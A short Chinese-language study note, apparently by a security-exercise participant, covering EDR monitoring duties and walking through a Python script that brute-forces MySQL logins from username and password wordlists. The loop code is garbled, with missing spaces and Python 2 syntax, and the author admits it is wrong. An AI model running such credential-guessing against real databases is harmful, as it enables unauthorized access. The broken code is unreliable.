护网 日常登入EDR等网站查看主机是否上线漏洞威胁等
几日已到规定工作日,为在EDR上出现的主机地址,通知相关人员对未上线的地址进行封堵
python爆破数据库
爆破脚本大概代码 根据需求进行整改:https://www.jb51.net/article/94868.htm
sys.argv[x]的用法是:https://www.cnblogs.com/aland-1415/p/6613449.html
从网址中我们可以了解到基本的用法
输入 mysql.py username.txt password.txt localhost 3306
其中sys.argv[0]为第一个字符串 也就是mysql.py
以下代码为
mysql_username = open(sys.argv[1],mode='r')
common_weak_password =open(sys.argv[2],mode='r')
分别是读取1.2的文件也就是 username.txt password.txt
host = sys.argv[3]
port = sys.argv[4]
这里3.4 就是上述命令中的localhost 3306的
然后执行循环语句
因为脚本中的循环语句有问题 正确的循环语句还在学习中
forusername inmysql_username:
forpassword incommon_weak_password:
try:
db =MySQLdb.connect(host, username, password)
success =True
ifsuccess:
printusername, password
exceptException, e:
pass
这是可以查询到的循环语句需要整改
注意:python对空格有着严格的要求不能随意按否则会脚本运行错误
mysql_username = open(sys.argv[1],mode='r')
common_weak_password =open(sys.argv[2],mode='r')
这是读取username.txt password.txt 后的值将他输出起来感觉有点奇怪